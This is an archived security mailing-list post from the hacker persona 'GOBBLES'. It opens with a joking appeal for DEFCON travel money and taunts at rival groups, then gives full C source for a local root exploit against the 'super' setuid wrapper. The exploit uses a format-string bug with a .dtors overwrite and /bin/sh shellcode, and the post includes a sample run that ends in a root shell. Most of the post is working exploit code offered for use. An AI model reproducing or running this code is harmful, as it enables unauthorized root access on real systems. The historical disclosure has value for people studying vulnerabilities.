lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: gobbles at hushmail.com (gobbles@...hmail.com)
Subject: The SUPER Bug

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Apologies to this list.  You won't be forgotten in the future.

/*
 * SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES
 *
 * When GOBBLES say he and he security team
 * are non-profit. He really mean NON-profit.
 * This means GOBBLES and he GOBBLES Security
 * Labs (GSL) friends do not have much funds.
 *
 * GOBBLES was hoping to receive the money
 * for speaking at the defcon gathering of
 * security enthusiasts up front. So he could buy
 * and pay for he ticket to Las Vegas from the great city
 * of Baltimore where he currently resides.
 *
 * GOBBLES is not selling out.  GOBBLES is just admitting that he
 * need your help.  Please, help GOBBLES!
 *
 * After many e-mails to defcon organisers it became
 * apparent to GOBBLES this was not going to happen.
 * This mean GOBBLES has no way of getting to defcon.
 * This also mean GOBBLES cannot deliver he talk that
 * are named "Wolves among us". Alot of time and work
 * went into the preperation of this talk and it was
 * to be the grand finale of the year of the turkey
 * (2002). With many new 0-day to give out and many
 * great anouncements to be made.
 *
 * Thanks to Jeff Moss (dt@...con.org, jmoss@...ckhat.com)
 * you, the defcon attendee, may very well get cheated out
 * of attending one of the most provocative and daring
 * events defcon history has ever seen.
 *
 * 	!!! ITS NOT TOO LATE..BUT HURRY !!!
 *
 * Help GOBBLES go to defcon. GOBBLES give so much to
 * the community..is it not time the community now help
 * a poverty stricken turkey to spread his wings and fly
 * towards fame and glory?
 *
 * Reasons why you should help GOBBLES get to defcon:
 *
 * -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper
 *
 * -- Seeing GOBBLES present naked: Priceless.
 *
 * -- Zeroday (possible hardcover) GOBBLES comic
 *
 * -- A chance to buy GOBBLES art
 *
 * -- A chance to receive _free_ GOBBLES T-shirts
 *
 * -- Copies of those exploits you couldn't code
 *
 *
 * What does GOBBLES need?
 *
 * Basically GOBBLES need to round up 300 US dollars before saturday.
 * "Wolves among us" is sheduled for the last day of defcon.
 * Namely 3PM on Sunday August 4th. As you can very well imagine
 * this talk was going to blow the lid off of more dirty secrets
 * than there are noodles in China. With your help GOBBLES can still
 * make this happen. So what GOBBLES is asking for is a little helping
 * hand from the community. If anyone has the funds to sponsor GOBBLES
 * to come to defcon please contact GOBBBLES at GOBBLES@...hmail.com.
 *
 *     !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!
 *
 * GOBBLES accepts Western Union payments.  GOBBLES will not accept anything
 * beyond the amount needed for travel to Vegas and back.  GOBBLES is not
 * selling out, GOBBLES is asking help from those penetrators and researchers
 * that GOBBLES helps every day.
 *
 * In other news, ISS rejected GOBBLES request for a job application.  It
 * seems that they're afraid of getting scalp'd.
 *
 * 			     Political statement:
 * HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE
 * PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!!
 *
 * FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN
 * JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00
 * FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM
 */

/*
 * GOBBLES-own-super.c
 *  -- root exploit for root hole in root wrapper
 *
 * Super is sudo wannabe that boasts much security.
 * GOBBLES think people who write setuid wrappers
 * should learn to program securely before opening
 * big hoohoo about how secure program is.
 *
 * Current super version (3.18):
   -- ftp://ftp.ucolick.org/pub/users/will/
 *
 * Super maintainer say following about he code:
 *
 * "Super allows an admin to control access to files
 *  and functions for users. It is similar to sudo, but
 *  uses a different approach in the configuration file."
 *
 * Problem:
 *
 * When super is compiled to use syslog(3) for its logging
 * of error messages the following lines makes pre-auth
 * local root exploitation rather trivial:
 *
 * From error.c
 * ...
 * #define SysLog(pri, buf) syslog((pri), (buf))
 * ...
 * SysLog(error_priority, buf);
 * ...
 *
 * This means users that are not in the super config file
 * will be able to execute code with root priviledges.
 *
 * "Super acts as a SetUID wrapper around system commands
 *  to make sure the commands are executed safely, and
 *  only by authorized users."
 *
 * 		hehehe ;PPpPPPPp
 *
 * Love,
 * GOBBLES
 * GOBBLES@...hmail.com
 *
 * Official site: http://www.bugtraq.org
 * Official mirror: http://www.immunitysec.com/GOBBLES/
 */

/* Proof Of Concept:

$ gcc GOBBLES-own-super.c -o GOBBLES-own-super
$ ./GOBBLES-own-super

Usage:
./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]

$ objdump -s -j .dtors /usr/local/bin/super

/usr/local/bin/super:     file format elf32-i386

Contents of section .dtors:
 8063f7c ffffffff 00000000                    ........

$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx??%.49103x%29$hn%.16305x%30$hn'.
sh-2.05#

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>

#define ALLIGN		2
#define DPA		29

#define SUPER		"/usr/local/bin/super"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[256];

int
main(int argc, char **argv)
{
	unsigned long t, w;
	int dpa, allign, shift = 0;
	char c, *store;

	if(argc == 1) {
		fprintf(stderr, "\nUsage: \n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\n", argv[0]);
		exit(0);
	}

	allign = ALLIGN;
	dpa = DPA;

	while((c = getopt(argc, argv, "t:o:A:")) != EOF) {
		switch(c) {
			case 't':
				sscanf(optarg, "%p", &store);
				t = (long)store;
			 	t += 4;
				break;
			case 'o':
				dpa = atoi(optarg);
				break;
			case 'A':
				allign = atoi(optarg);
				break;
			default:
				fprintf(stderr, "hehehe ;PPppPPPp\n");
				exit(0);
		}
	}

	store = NULL;

	if((store = getenv("GOBBLES")) == NULL) {
		stuff();
		if(execve(argv[0], argv, environ)) {
			fprintf(stderr, ". problem re-executing\n");
			exit(1);
		}
	}

	w = (long)store;
	// shift is signed so this works both ways
	shift = (strlen(argv[0]) - strlen(SUPER));
	w += shift;

	fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", t, w);

	buildstring(t, w, dpa, allign);

	if(execl(SUPER, "super", string, NULL)) {
		fprintf(stderr, "error executing\n");
		exit(1);
	}
}

void
buildstring(unsigned long t, unsigned long w, int dpa, int allign)
{
	unsigned int un, deux, x, b[4], namelen;
	char a_buf[4];
	struct passwd *pass;

	memset(string, '\0', sizeof(string));
	memset(a_buf, '\0', sizeof(a_buf));

	if((pass = getpwuid(getuid())) == NULL) {
		fprintf(stderr, ". can't find your username\n");
		exit(1);
	}

	namelen = strlen(pass->pw_name);

	fprintf(stderr, ". username: %d bytes\n", namelen);

	for(x = 0; x < allign && x < sizeof(a_buf); x++)
		a_buf[x] = 'x';

	b[0] = (t & 0x000000ff);
	b[1] = (t & 0x0000ff00) >> 8;
	b[2] = (t & 0x00ff0000) >> 16;
	b[3] = (t & 0xff000000) >> 24;

	un = (w >> 16) & 0xffff;
	deux = w & 0xffff;

	if(un < deux) {
                snprintf(string, sizeof(string)-1,
			"%s"
			"%c%c%c%c%c%c%c%c"
			"%%.%hdx" "%%%d$hn"
			"%%.%hdx" "%%%d$hn",
                        a_buf,
			b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
                        un - (8 + allign + 29 + namelen),
			dpa, deux - un, dpa + 1

		);
        }
        else {
                snprintf(string, sizeof(string)-1,
			"%s"
			"%c%c%c%c%c%c%c%c"
			"%%.%hdx" "%%%d$hn"
			"%%.%hdx" "%%%d$hn",
                        a_buf,
			b[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3],
                        deux - (8 + allign + 29 + namelen),
			dpa, un-deux, dpa + 1

		);
        }
}

void
stuff(void)
{
        char code[] = // the setuid 0 with the execve of the /bin/sh
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
	"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
	"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
	setenv("GOBBLES", code, 1);
}

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj1H7cIVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAP4YYA
njnq2IvxHZHXibibOUzq83XUnKWaAKCQ91rP+cmxZICuMwkBb9nYnpEibA==
=nUic
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists